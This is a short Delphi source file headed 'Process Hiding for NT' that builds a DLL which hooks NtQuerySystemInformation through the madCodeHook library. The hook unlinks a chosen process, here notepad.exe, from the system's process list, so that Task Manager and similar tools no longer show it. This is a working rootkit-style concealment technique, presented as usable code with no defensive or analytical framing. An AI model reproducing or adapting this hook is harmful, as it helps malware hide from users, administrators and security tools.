System Delphi

{
Process Hiding for NT
}
library HookProcessEnumeration2;
{$IMAGEBASE $57000000}
uses Windows, SysUtils, madCodeHook;
type
PProcessInfo = ^TProcessInfo;
TProcessInfo=record
dwOffset : dword; // an ofset to the next Process structure
dwThreadCount : dword;
dwUnkown1 : array[0..5] of dword;
ftCreationTime : TFileTime;
dwUnkown2 : dword;
dwUnkown3 : dword;
dwUnkown4 : dword;
dwUnkown5 : dword;
dwUnkown6 : dword;
pszProcessName : PWideChar;
dwBasePriority : dword;
dwProcessID : dword;
dwParentProcessID : dword;
dwHandleCount : dword;
dwUnkown7 : dword;
dwUnkown8 : dword;
dwVirtualBytesPeak : dword;
dwVirtualBytes : dword;
dwPageFaults : dword;
dwWorkingSetPeak : dword;
dwWorkingSet : dword;
dwUnkown9 : dword;
dwPagedPool : dword; // kbytes
dwUnkown10 : dword;
dwNonPagedPool : dword; // kbytes
dwPageFileBytesPeak : dword;
dwPageFileBytes : dword;
dwPrivateBytes : dword;
dwUnkown11 : dword;
dwUnkown12 : dword;
dwUnkown13 : dword;
dwUnkown14 : dword;
ThreadInfo : PThreadInfo; // Thread list
end;
var NtQuerySystemInformationNextHook: function(dt : dword; buf : pointer; bufsize : dword; retlen : pointer) : dword; stdcall;
function NtQuerySystemInformation(dt : dword; buf : pointer; bufsize : dword; retlen : pointer) : dword; stdcall;external 'ntdll.dll';
function NtQuerySystemInformationCallbackProc(dt : dword; buf : pointer; bufsize : dword; retlen : pointer) : dword; stdcall;
type
PBA = ^TBA;
TBA = array[0..1000000] of byte;
var
tmpbuf: PBA;
Pinfo,LastPinfo : PProcessInfo;
cp: DWORD;
curproc:string;
begin
Result := NtQuerySystemInformationNextHook(dt,buf,bufsize,retlen);
if dt<>5 then exit;
if result<>0 then exit;
cp := 0;
tmpbuf := buf;
Repeat
Pinfo := PProcessInfo(@tmpbuf[cp]);
curproc:=WideCharToString(pinfo^.pszProcessName);
if lowercase(curproc)='notepad.exe' then
begin
if pinfo^.dwOffset=0 then begin LastPinfo^.dwOffset:=0;exit;end
else LastPinfo^.dwOffset:=LastPinfo^.dwOffset+pinfo.dwOffset;
end
else
begin
LastPinfo:=Pinfo; //I coded this part :P
end;
cp := cp + Pinfo^.dwOffset;
until Pinfo^.dwOffset = 0;
end;
begin
HookCode(@NtQuerySystemInformation, @NtQuerySystemInformationCallbackProc, @NtQuerySystemInformationNextHook);
end.